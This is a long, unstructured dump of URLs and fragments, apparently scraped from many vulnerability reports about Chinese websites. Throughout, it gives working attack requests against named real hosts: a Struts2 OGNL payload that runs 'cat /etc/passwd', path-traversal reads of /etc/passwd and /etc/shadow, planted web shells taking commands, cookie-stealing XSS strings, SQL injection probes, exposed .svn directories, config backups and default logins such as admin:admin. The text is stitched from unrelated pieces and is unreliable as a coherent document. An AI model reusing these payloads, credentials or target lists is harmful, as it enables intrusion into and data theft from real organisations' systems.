http://search.shouji.baofeng.com/sort.php http://search.shouji.baofeng.com/ls_columns.php?platf=android http://search.shouji.baofeng.com/client_settings.php?platf=android http://www.weidingtech.com/Soft.asp?ArticleID=5产品线 
http://www.weidingtech.com/Works.asp?ClassID=15产品应用范围 inurl:rontmaintain/index.action http://www.gxzzy.cn/rontmaintain/index.action http://www.xingtiancar.com/rontmaintain/index.action http://www.4006066813.com/rontmaintain/index.action http://121.8.254.235:8070/qy_gczlaqgl/toLogin.action http://221.192.235.106:8080/jdxt_hbs/toLogin.action http://211.147.244.201:8000/gzjdxtoa/toLogin.action http://zjxt.zjcic.net:8080/JD_GuangDongZhanJiang/toLogin.action http://kfqzjz.gdd.gov.cn:8000/jdxt_kfq/toLogin.action http://www.ncjszj.com:8005/ncs_help/toLogin.action http://www.3hmis.com/server/2012-05-15/2332.html http://115.182.94.162:8080/resin-admin/ http://115.182.94.163:8080/resin-admin/ admin:admin http://pkg-repo.oss.letv.com/ http://117.121.58.26:8080 http://117.121.58.25:8080 http://115.182.94.163:8080 http://115.182.94.162:8080 http://115.182.94.163:8080/resin-admin http://www.sdta.cn/dtss/WEB-INF/ http://eservice.hxlife.com/logout.action http://www.hxlife.com/hxrs/zhaopinSearch.action http://220.181.35.173:8080/uploadMonitor/uploadTask.do http://www.zhenjiang.gov.cn/wcm/WCMV6/login.jsp http://g.51cto.com/group_index.php?do=bbsedit&tid=248203&sid=248203&gname=job&actions=edit&page=1 http://www.cucpay.com/front/business!detail.action http://www.51zxw.net/memberList.aspx http://www.51zxw.net/p_list_js_fl.asp?id=23 https://sp.pkufi.com/admin jdbc:microsoft:sqlserver://192.168.101.35:1433;DatabaseName=EMAP http://www.wenben114.com/ReadArt.asp?ArtID=776 http://www.wenben114.com/ReadArt.asp?ArtID=776 http://114.112.70.71/gotologin.box www.lqedu.com.cn http://www.duoc.cn/admin/直接登录 http://ghj.weifang.gov.cn/ShowInfoList.aspx?url_pid=156&cateid=183 http://ghj.weifang.gov.cn/ShowInfoList.aspx?url_pid=156&cateid=183 www.it http://m.jobui.com/trends?cityKw=%E9%9A%8F%E5%B7%9E http://jobui.com/?cityKw=%E6%AD%A6%E6%B1%89 http://jobui.com/trends?jobKw=88952634&cityKw=%E6%AD%A6%E6%B1%89 http://www.jobui.com/?cityKw=%E4%B8%8A%E6%B5%B7 
http://m.jobui.com/trends?cityKw=%E9%9A%8F%E5%B7%9E http://m.jobui.com/?cityKw=%E5%8C%97%E4%BA%AC http://m.jobui.com/changecity/city.php?code=170000 http://m.jobui.com/changecity/city.php?code=170000 http://sc.5173.com/.svn/entries https://dns.norton.com/dnsweb/huConfigurePc.do?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://pro.baidu.com/blog/article/282.html https://ebusiness.pkufi.com/about/default.aspx?ID=24 http://ebusiness.pkufi.com/service/faq.aspx?ID=996&Tag=4 https://ebusiness.pkufi.com/service/faq.aspx?ID=996 https://ebusiness.pkufi.com/service/info.aspx?ID=995&DownID=17 http://ebusiness.pkufi.com/service/info.aspx?ID=995 http://www.now.cn/callcenter/.svn/entries svn://localhost/svn/nowcn-callcenter/tag/current/tmis/callcenter svn://localhost/svn/nowcn-callcenter http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles&filelx=jpg|jpeg http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles&filelx=jpg|asp http://enkj.com/UploadFiles/sb1.asp http://www.easyhadoop.com/ http://www.vistastory.com/phpmyadmin/index.php http://rsks.jshrss.gov.cn/jshr/search/toLoadZyjsrySearch.action http://www.avira.com/ http://3g.gfan.com/.svn/entries http://115.182.94.99:9000 http://115.182.94.67:9000 user:user user:user可以跳转到/mainMenu.shtml http://220.181.153.108/sysworkflow/zh-CN/uxmodern/main admin:admin http://broadcast.admin.itv.letv.com test:test 
http://hangye.letv.com test:test http://www.guoxuwang.cn/.svn/entries https://cp.guoxuwang.cn/.svn/entries https://svn.guoxuwang.com/svn/gxw-domain/trunk/web/WebRoot https://svn.guoxuwang.com/svn/gxw-domain http://124.127.255.10:8080/ http://demo.acsoft.com.cn/,类似使用7.0的网站同此 http://www.gps.org.cn/gps.rar http://dev.one-foundation.com/ http://dev.one-foundation.com/WebAdmin/config.php.gz http://dev.one-foundation.com/TENPAY/jump.php.gz http://dev.one-foundation.com/TENPAY/jump2.php.gz http://dev.one-foundation.com/WebAdmin/admincp.php.gz http://dev.one-foundation.com/WebAdmin/index.php.gz http://demo.51able.com/ http://220.181.153.157 admin:123456, admin1:123456,登录成功 admin2:123456 admin3:123456登录成功 http://www.qujiang.gov.cn/website/porta/QJPortalAction!secondIndex.action http://124.127.255.45/lenovo/ http://124.127.255.45/ZmptY2NtYW5hZ2Vy/ http://124.127.255.45/css http://124.127.255.45/images/.svn/text-base/ http://124.127.255.45/tools/ http://124.127.255.45/lenovo/js/ http://m.mail.qq.com/ http://w.mail.qq.com/ content://com.htc.calendar/../../../../../即可访问到根目录下的可以对外访问的所有文件。 http://99bill.com/fiquery/customorder/managecustomorder.htm?payto=xxx http://jiaoyuhuodong.pkufi.com/ http://jiaoyuhuodong.pkufi.com/activity_report_detail.php?id=3 http://uidc.cndns.com/wp-login.php?loggedout=true http://www.ldyx.org/phpmyadmin/ http://103.22.252.251/ http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/*%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-bond0%00.jpg 
http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/services%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/my.cnf%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/hosts%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/sysctl.conf%00.jpg http://103.22.252.251/smenu.php?menu=../../../../../../../../../../etc/libuser.conf%00.jpg http://www.guoxuwang.cn/servlet/checkServlet.do?id=19 http://www.guoxuwang.cn:8700/servlet/checkServlet.do?id=19 http://inside.climate.sh.cn/ bt:/pentest/database/sqlmap# http://inside.climate.sh.cn/check.aspx http://www.yxaia.com/admin/Admin_login.asp http://yiqi11a37.site4.sitestar.cn/yiqi11a37/wwwroot/index.php?_m=mod_article&_a=fullist&caa_id=12 http://yiqi11a37.site4.sitestar.cn/yiqi11a37/wwwroot/admin/ http://202.96.202.186 www.zhujiwu.com http://gdkh.gtja.com/detail.php?aid=62 http://60.28.205.38:8080/ur/showStatic.jsp http://www.jitaihotel.com/Serach.aspx?searchText=%e4%bf%83%e9%94%80 http://www.exploit-db.com/exploits/28713/ http://wsyy.gzmz.gov.cn:9080/status?full=true http://www.tzsb.gov.cn:7001/status?full=true http://218.58.70.220/ http://218.58.70.220/main.asp http://218.58.70.220/SupplyInfoAddB.asp?ID=97 http://218.58.70.220/GG_View.asp?GGTy=%D7%EE%BD%FC%B9%AB%B8%E6&Top=10 http://218.58.70.220/SupplyInfoAddB.asp?ID=97 http://www.niteizechina.cn/products.php?id=20 http://www.sansui-cn.com/products.php?id=21 http://wenda60.com/admin_hiall_wenda/index.php?c=home&a=login http://wenda60.com/admin_hiall_wenda/index.php?c=statistics&a=tests_export&tid=128 http://www.joiest.com/ http://www.jdoou.com/users/center.jhtml http://www.haiercrm.com/acceptcatdata/index.jsp http://www.mytaoyuan.com/ http://photo.1disk.cn/homeapply.aspx?GetName=1 www.pigai.org/index.php?c=teacher&a=dumpinfo&st=3&do=edit&eid=845954 http://travel.haier.com/travel/Hotel/SPHotelInfo/ReLogin.aspx http://union.wap.58.com:8080/ 
http://weigou.baidu.com/service/user/order/view?order_id=1029679&package_id=1038393 http://weigou.baidu.com/service/user/order/view?order_id=1029678&package_id=1038392 http://weigou.baidu.com/service/user/order/view?order_id=1029677&package_id=1038391 http://weigou.baidu.com/service/user/order/view?order_id=1029680&package_id=1038395 http://topic.19lou.com/.svn/entries http://mes.juneyaoair.com/mes/ http://salon.hexun.com/topicsearch.aspx http://www.sjzfgj.gov.cn/admin/admin.aspx http://220.181.153.197 http://old.zqdz.gov.cn/website/portal/DZPortalAction!secondIndex.action http://www.xhxzfw.cn/indexAction.action http://211.140.246.58:8080/indexAction.action http://219.142.122.236/lenovo/ http://219.142.122.236/ZmptY2NtYW5hZ2Vy/ http://219.142.122.236/ZmptY2NtYW5hZ2Vy/p4data/Rdata/Rfiles/help.jsp http://219.142.122.236/ZmptY2NtYW5hZ2Vy/p4data/Rdata/Rfiles/ http://219.142.122.236/css/.svn/ http://219.142.122.236/images/.svn/text-base/ http://jwfile.juneyaoair.com:88/Admin/Login.aspx http://union.vjia.com/ http://bulo.hujiang.com/home http://xclub.xtep.com/WebSiteManage/Order/OrderList.aspx?OrderStatus=0 http://xclub.xtep.com/welcom.aspx http://www.tclmobile.com.cn/ http://www.shanshuihotel.com/index.php?m=about&id=64 http://www.shanshuihotel.com/?m=activity&a=show&id=16 http://www.shanshuihotel.com/index.php?m=reservation&a=tjifo&resortId=26 http://www.shanshuihotel.com/index.php?m=activity&a=show&id=15 http://cetv.com/character/kristy/com1./kz10k.asp http://dellcity.dell-brand.com/admin/ http://sws.ecare365.com http://sws.ecare365.com/a/pwn.jsp?cmd=id http://sws.ecare365.com/a/pwn.jsp?cmd=ifconfig http://learning.haier.com/ http://learning.haier.com/a/pwn.jsp?cmd=命令 http://learning.haier.com/status?full=true http://learning.haier.com/a/ http://learning.haier.com/a/pwn.jsp?cmd=whoami http://www.thankyou99.com/shop-list.php?type=2&id=11 http://218.58.70.145:8888/ http://218.58.70.145:8888/common/selmultiman.jsp?userGroup=2 
http://218.58.70.143/security/loginInit.action http://www.aihuwai.net/wwwroot.rar http://www.aihuwai.net URL:http://zhi.pcpro.com.cn/forum/uc_server/admin.php http://web.sudu.cn/ http://web.sudu.cn/admin.php http://www.lz.chinanews.com/Newslist.aspx?ClassID=8 http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5589 http://www.lz.chinanews.com/ShowEC.aspx?NewsID=5518 http://124.127.169.51 http://hyy.ah163.net/meeting/ http://class.ah163.net/meeting/ http://en.blossomhillinn.com/view/index.php?act=info&cid=32&tid=33 http://www.blossomhillinn.com/news/index.php?act=detail&nid=34 http://blossomhillinn.com/news/index.php?act=detail&nid=33 http://en.blossomhillinn.com/view/index.php?act=info&cid=32&tid=33 http://218.94.61.17/OnlineServer/LoginAction.action encap:Ethernet CB:15:4A:50 addr:192.168.4.180 Bcast:192.168.4.255 Mask:255.255.255.0 cbff:fe15:4a50/64 Scope:Link MTU:1500 packets:23055939 packets:12862125 txqueuelen:1000 http://218.58.70.161/ http://218.58.70.161/info/info.action http://et.airchina.com.cn/caapp/caapp/search_refundSearch.action?languageCode=zh_CN&reservationId=0017209457 http://www.kidoooer.com/wwwroot/ziyuan/other/ http://www.kidoooer.com/bbs/upload/forum.php http://www.kidoooer.com/bbs/Discuz_X3.0_SC_GBK-1/upload/install/这里可以重新安装 http://www.xwjy.cn/web-console/ http://www.xwjy.cn/jmx-console/ jdbc:hsqldb:${jboss.server.data.dir}${/}hypersonic${/}localDB jdbc:oracle:thin:@localhost:1521:orcl https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp https://gdp.huaweisymantec.com/hwdgd/jsp/comm/loginproc.jsp https://gdp.huaweisymantec.com/hwdgd/jsp/comm/login.jsp http://chuangyi.baidu.com http://bbs.aili.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://jiaoyou.58.com/usercenter http://126.am/****3 http://www.chineseall.cn http://www.exploit-db.com/exploits/28713/ http://218.58.70.201/ http://tvweb.letv.com/index 
http://123.125.89.225 http://96118.jl.gov.cn/Default.aspx http://www.wodebaoguo.com http://ips.11185.cn http://win.vjia.com/ http://210.72.11.64/nheicheck/login/login.action http://srv.sgcc.com.cn/statistics/index.php http://www.cepp.sgcc.com.cn/admin/left.aspx http://djhdj.gov.cn/news.php?type=class_2&sid=1&id=1 http://www.circ.gov.cn/dig/advsearch.action http://119.253.52.147/ShopCenter/ShopList/ShopList?ShopNameParam=aa http://www.xiaolan.gov.cn/news.php?id=19045 https://www.able9.com/ https://www.able9.com/smart/compindex https://www.able9.com/smartupload/files/company/2013-10-11/201310111326340461814.jsp http://www.cyhelp.org/index.php?m=admin inurl:web!getTitleGo.action http://www.cpigeon.com/Users/AssociationManage/ http://www.10010.com/的左侧导航中【常用功能】--【宽带测速】 http://www.halsign.com URL:http://www.enjoy3c.com/admin/login http://anchor.yingchuang.com/ http://anchor.yingchuang.com/consult/seminar/detial.asp?id=227 http://www.rsj.suzhou.gov.cn/web.rar http://xy.ue189.cn/memberIndex.action bt:/pentest/database/sqlmap# http://ideaclub.lenovo.com.cn/club/index.php?c=index&f=chkCity&m=store http://www.jyrjy.gov.cn/news/show.php?id=102 http://qc.homeinns.com/Login.aspx http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://editorial.quanjing.com/catalog.aspx?pid=6382 http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://editorial.quanjing.com/featureshow.aspx?pid=6559 http://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=877422579 http://newyunying.xinnet.com/Default1.aspx http://newyunying.xinnet.com/DisposeServlet.aspx?InspectId=X131011009 http://shn.photo.qq.com/friendphoto/inqq http://www.thinkphp.cn/u/95959.html这个网址ID采集用户名,向全网发送垃圾信息后 http://www.mama.cn/q/}里面的任意话题回复或者发表话题都可以导致XSS http://open.lenovomm.com/ http://open.lenovomm.com/data/data.zip http://3g.happigo.com/webconfig.php.bak http://www.jxtii.com/productDetail.html?product_id=paidb2e62f108d93%27%20AnD%20%27a%27%3d%27a http://www.77.net/news_detail.php?id=4 
http://editorial.quanjing.com/admin.aspx http://www.quanjing.com/motion/subject.aspx?id=482 http://quanjing.com/similarsearch.aspx?pic_id=blm026956 http://quanjing.com/motion/cat/default.aspx?id=103001 http://www.quanjing.com/motion/subject.aspx?id=482%20and%201=1 http://www.quanjing.com/motion/subject.aspx?id=482%20and%201=2 http://club.5sing.com/CTrend/988/156864 http://club.5sing.com/Detail/988/8130 http://club.5sing.com/CTrend/988/8130 https://www.able9.com/smartupload/upload/downLoadFile?filename=../../../../../../../../../../etc/passwd http://demo.51able.com/system/ http://www.eetop.com/index/login www.deadfake.com/Send.aspx http://docsys.sharp.cn:8006/dealer/system/login.jsp http://docsys.sharp.cn:8006/dealer/system/frame/left.html里有新闻管理,上传不限制,任意文件上传。 URL:http://www.lestorage.com/ http://www.lestorage.com/sql.php http://180.153.132.91/invoker/JMXInvokerServlet/ http://180.153.132.107/invoker/JMXInvokerServlet/ http://180.153.132.249/invoker/JMXInvokerServlet/ http://jianyi.sucop.com/thread/195.html?_=1381576331908 http://jianyi.sucop.com/admin/ http://219.153.32.161/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://219.153.32.161/a/pwn.jsp?cmd=whoami http://219.153.32.161/a/pwn.jsp?cmd=ipconfig http://219.153.32.161/a/pwn.jsp?cmd=systeminfo http://219.153.32.161/a/pwn.jsp?cmd=dir http://passport.baihe.com/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 exp:http://www.exploit-db.com/exploits/28713/ http://www.csice.org.cn/zxxx_info.jsp?zxid=14842: http://www.qdsn.gov.cn:88/cn/shell.aspx http://www.exploit-db.com/exploits/28713/ http://appwiz.lenovo.net http://runforfun.vanke.com/website.rar http://bbs.letv.com/index.php http://huan123.android.huan.tv/homeList.action http://www.ahtcedz.gov.cn http://4r.gmyok.com:8/login!toLogin.action http://www.xiangchi.com:99/login!toLogin.action http://www.inm.cc:88/login!toLogin.action http://4r.tycc.cn:9007/login!toLogin.action http://121.14.4.144:8080 http://www.jdxww.gov.cn/ 
http://www.jdxww.gov.cn/plus/mytag_js.php?aid=9090 http://www.fitchratings.com.cn/news_detail.php?id=4036 http://www.fitchratings.com.cn/news_detail.php?id=4036 http://z.yy.com/zone/index.do http://s3.guba.sina.com.cn/sina_guba/2013/10/13/image_201310130932331505797.html http://wap.e5618.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.cgws.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.ytzq.net/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.gjzq.com.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.kysec.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://m.sywg.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://hi.hexin.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://wap.cnpsec.com/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://61.164.56.234/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://61.139.133.87/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://gdyd.10jqka.com.cn/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg http://mail.sina.com.cn/mobile/index.php http://km.wfj.com.cn/ http://www.exploit-db.com/exploits/28713/ http://wcba.hupu.com/players-7-000003 http://wcba.hupu.com/players-7-000003',显示错误 http://wcba.hupu.com/players-7-000003* http://shouyou.renren.com/ http://mail.189.cn/webmail/jsp/189misc/register/login.html http://wap.189.cn/reg/register.jsp http://wap.189.cn/wapmail http://tieba.baidu.com/bigscreen/fbs?tid=2642760579&offset=27&res_num=30 http://121.14.4.175/ http://121.14.4.175/crm/SystemMaintain/fuwuStart_show.ml http://121.14.4.175/upload/1.jsp http://tieba.baidu.com/game/index?tab=lottery http://opsii-test.koyoo.cn/index.show?actionMethod=init http://125.93.53.58 http://www.suning.com.cn/djgz/article.asp?id=14 http://www.suning.com.cn/djgz/article.asp?id=14 
http://www.suning.com.cn/djgz/article.asp?id=14 http://www.ttschina.com.cn/site/ttschina/joinus_list.jspx http://www.yonyou.com.hk/new/enquiry.php?uid=1 http://www.yonyou.com.hk/new/download_view.php?uid=4 http://www.yonyou.com.hk/new/_inc_body_banner2.php?uid=92 http://www.yonyou.com.hk/new/support_view.php?uid=1 http://125.93.53.4/ http://www.stategrid.com.cn/cn/ http://219.232.246.252:8000 http://219.134.188.41:8080/Invoice/login.jsp site:jd.com了。 http://219.232.246.220:8000 http://125.93.53.9/ http://125.93.53.70:9998/ http://125.93.53.70:9998/a/pwn.jsp?cmd=ifconfig http://125.93.53.79/jmx-console/ http://125.93.53.79/ http://125.93.53.79:8080/csm_comm/page/login.jsp http://passport.hupu.com/sendpwd,post包"username=88952634&Input2=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81&email=safe3q%40gmail.com http://passport.hupu.com/sendpwd www.sn12333.gov.cn http://sn12333.gov.cn/admin/ http://sbkfw.sn12333.gov.cn/user_tosbkonline.sn http://sbkfw.sn12333.gov.cn/ge.jsp http://ocr.eciq.cn/ http://ocr.eciq.cn/sysmanage/registryParse.jsp?parentid=0 http://bbs.hupu.com/robots.txt/a.php http://my.hupu.com/robots.txt/a.php http://youxi.hupu.com/static/gameIndex/js/common.js/a.php http://hunangtzy.com/comm_front/email/uploadImageFile_do.jsp?uri=/../../../ http://legend.7daysinn.cn/Legend/MyTradingList.aspx http://127.0.0.1/search.asp?id=2 http://landinfo.mlr.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://landinfo.mlr.gov.cn/editor/filemanager/connectors http://124.127.255.43/ http://124.127.255.43/lxjweb/ http://124.127.255.43/a/pwn.jsp?cmd=id http://124.127.255.43/a/pwn.jsp?cmd=ifconfig http://**.**.**//pc.vigocam.com http://**.**.**/index.phpmenu=4&controller=faqs&action=content&pkid=138 http://www.ccidedu.com/ http://72ren.com/viewSchool.action http://125.93.53.82/oa/ http://125.93.53.82:7001/ http://cio.sasac.gov.cn/hy/1002-1377141505095/meetingUserLogin!genMeeting%20UserCheckCode.action?redirect:http://www.baidu.com 
http://yoyo.263.net/gift_goods_detail.php?gid=10121 http://blog.duobei.com/wp-admin/ android:name=".contentprovider.AccountProvider android:permission="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.mobile.account android:name=".contentprovider.BaseProvider android:permission="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.mobile.base android:protectionLevel="dangerous",这个不够,声明这个权限又能够读取到信息 android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:protectionLevel="dangerous android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT http://edp.nankai.edu.cn/search/index.php?imageField=&myord=uptime&myshownums=20&key=123 http://edp.nankai.edu.cn/down/html/?88'.html http://cts.nankai.edu.cn/news2.asp?ArticleID=1168 http://cj.nankai.edu.cn/search/?q=输入关键词&type=135 http://mta.nankai.edu.cn/news_list.php?mParendid=5&mname=培养方案&mid=21 http://teda.nankai.edu.cn/nku/ShowID.asp?id=187 http://teda.nankai.edu.cn/showdjyd.asp?ClassID=51 http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/upload/test.html http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://sysaqk.nankai.edu.cn/shs/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://rsc.nankai.edu.cn http://rsc.nankai.edu.cn/PhpMyAdmin/index.php FTP:192.168.8.32 http://cts.nankai.edu.cn/database/ http://wyxyjpk.nankai.edu.cn/bbs/data/ http://ygb.nankai.edu.cn/xsj/z.asp http://www.elinkhost.com/plugins/newalipay/query_trade.php?oid=--1381742418 http://www.gaoyou.gov.cn/zfxxgk/gkml_nr.php?id=2759 http://dev.tudou.com/v5/showcase.php?id=24 http://ids.gzstats.gov.cn/ids/admin/debug/env.jsp http://ids.gzstats.gov.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../etc/passwd http://sso.sz.gov.cn/ids/admin/debug/env.jsp 
http://sso.sz.gov.cn/ids/admin/debug/fv.jsp www.ctyun.cn www.dongfeng-honda.com/honda_mediaReport.php?nid=604 http://ids.hebei.com.cn/ids/admin/debug/fv.jsp?f=/../../../../../../etc/shadow http://ids.hebei.com.cn/ids/admin/debug/env.jsp http://124.128.48.211:8080/GPSMonitor/index.jsp http://dzb.hasee.com/service/showlist.asp?cat_id=6 http://www.bjpc.gov.cn/ids/admin/debug/fv.jsp?f=%5Cweb.xml http://www.bjpc.gov.cn/ids/admin/debug/env.jsp http://ids.people.com.cn/ids/admin/debug/env.jsp http://ids.people.com.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/shadow http://qk.cass.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../../../etc/shadow http://qk.cass.cn/ids/admin/debug/env.jsp http://res.byd.cn/StorageModelM/login.action HellentekiMacBook-Pro:tools HellentekiMacBook-Pro:tools http://www.cnss.cn/trsids/admin/debug/env.jsp http://www.cnss.cn/trsids/admin/debug/fv.jsp?f=%5C..%5Cadmin%5Clogin.jsp http://wls.iphy.ac.cn/zhongyi/news_detail.php?id=35 http://passport.vodone.com/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/shadow http://passport.vodone.com/ids/admin/debug/env.jsp http://gongyi.wanmei.com/e/action/ListInfo/index.php?classid=60&category=48 http://enkj.com/include/upfile_head_img_src.asp?formname=form1&editname=head_img_src&uppath=UploadFiles http://222.74.37.246/ping.cgi http://222.74.37.246/ping.cgi http://www.spdns.com/Host/hostmore.asp?type=1 http://114.134.80.147/ http://114.134.80.147/admin/test/logs ftp://116.204.96.186/ http://www.yto.net.cn/[马赛克].rar http://www.yto.net.cn/[马赛克].rar http://www.amazon.cn/registry/wishlist/ http://cover.carrefour.com.cn/babys.jsp?babyId=44 http://dp.ha.xinhuanet.com/MessageManager/QueryMessageJoinNum.aspx?ID=98 http://dp.ha.xinhuanet.com/MessageManager/QueryMessageJoinNum.aspx?ID=98 http://servicenet.csvw.com/resource/Photo/2/285960.asp http://www.zbintel.com/knowledge/knowledge_2.asp?A2=17 http://115.182.51.59:8080/redmine/projects/our-wiki处找到几个用户 http://oa.letv.com/ 
ftp://putuoshan.gov.cn/PT/Business/putuoshan/ http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5NTUzMzMwMQ%3D%3D&appmsgid=10000142&itemidx=1&sign=62921fe68417e917f9ab668b83995a41&scene=3#wechat_redirect http://www.ccard.net.cn/ http://newtest.lashou.com/.svn/entries http://sptest.test.lashou.com/.svn/entries http://houtai.test.lashou.com/.svn/entries http://gms.gfan.com/system/page/login.jsp http://cnhonkerarmy.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf https://pim.suning.com/ http://61.132.255.208:15400/admin/ www.qq.com http://www.360gree.com/wwwroot.rar http://www.360gree.com/admin/Index.aspx http://www.ahly.gov.cn/hdcy/zxzx_show.jsp?ID=43 http://shoucang.dahe.cn/nlist.php?cid=40 URL:http://ideaclub.and-c.com/forum/admin.php http://go.163.com/2013/0927/lenovo/index.php.bak http://go.163.com/2013/0927/lenovo/user.txt http://ip/uias/login.jsp http://ip/uias/logon.action就进入后台了 http://www.jiaoshi.com.cn/main/highpayjobs.php?j=1228 http://www.jiaoshi.com.cn/main/highpayjobs.php?j http://sqlmap.org http://www.actonchina.com/news_info.aspx?id=406 inurl:news.asp?DHID= http://121.207.242.90/config/db.cfg.php http://121.207.242.64/config/db.cfg.php http://121.207.242.58/config/db.cfg.php http://cdn.market.hiapk.com/login.php http://cdn.market.hiapk.com/config/db.cfg.php http://www.sjd-logistics.com:8000/ http://www.sjd-logistics.com http://www.19lou.com/thread/category/structure/publish?fid=1637&modelId=10001】,在title中插入 http://www.zzqxw.gov.cn/work/Backstage/Login.aspx http://www.hf12345.gov.cn/Report-ResultAction.do?reportId=fc081f7f-cce8-4fa1-8518-b498476ea9c3&newReport=true&subjectId=47ac981594614fe6b7480fe88c6d5fc7 https://uniportal.huawei.com/accounts/register.do?method=toRegister&appurl=http%3A%2F%2Fforum.huawei.com%2Fjive4%2Findex.jspa&nls=zh 
http://203.208.46.145/#newwindow=1&q=intitle:trs身份&start=60 http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:ids&start=20 http://www.baidu.com/s?tn=baiduhome_pg&ie=utf-8&bs=intitle%3Atrs+ids&f=8&rsv_bp=1&rsv_spt=1&wd=intitle%3Atrs+ids+inurl%3Aids&rsv_sug3=8&rsv_sug4=369&rsv_sug1=4&inputT=2568 http://www.axsj.net http://www.axsj.net/AX_Product/SearchProductList.html?kw_forIndex=aaaaaaaaa http://bbs.lvmama.com/plugin.php?id=sosv_award:main&acid=2 http://www.zhhrss.gov.cn/SearchList.aspx?zhi=&pageindex=2 URL:http://sl.huatu.com/shladmin/login.php‘ http://124.205.22.105/test.jsp http://124.205.22.105/manage/flight/order/flightquery!getTicketInfoByPNR.action http://www.ctsmice.com/aboutCts.action http://www.ctsmice.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.sutenw.com/show.asp?Id=364 http://www.cnctc.cn:88/jmx-console/ http://www.cnctc.cn:88/-console/ http://erp.cnctc.cn:8088/web-console/ http://erp.cnctc.cn:8088/jmx-console/ http://avata.sdo.com/home.php?mod=space&uid=20129748&do=blog&quickforward=1&id=1257 http://club.suning.com/home.php?mod=space&uid=4085278&do=blog&quickforward=1&id=1044510 http://125.93.53.89:8088/eshow/index.php?r=site/login http://pub.ada.gov.cn:8001/inquiry/inquiryquestionWeb.jsp?strWebSite=31 http://pub.ada.gov.cn:8001//inquiry/inquiryquestionWebView.jsp?strQuestionId=116980088203727 http://pub.ada.gov.cn:8001/inquiry/inquiryquestionWeb.jsp?strWebSite=31 http://pub.ada.gov.cn:8001//inquiry/inquiryquestionWebView.jsp?strQuestionId=116980088203727 http://newsletter.zhongliangwomai.com:8081/smartedm/welcome.do http://ktshop.tcl.com/ http://ktshop.tcl.com/downloadfile.do?docid=7553 http://bbs.amap.com/blog-13223-191.html http://bbs.jd.com/forum-attachment-aid-NTAyMzE4fGZjNGJmOTExfDEzODE5MDExNzh8MzczMTA5NA%3D%3D-request-1.php.html http://www.ahdca.org/old/disbbs.asp?id=234 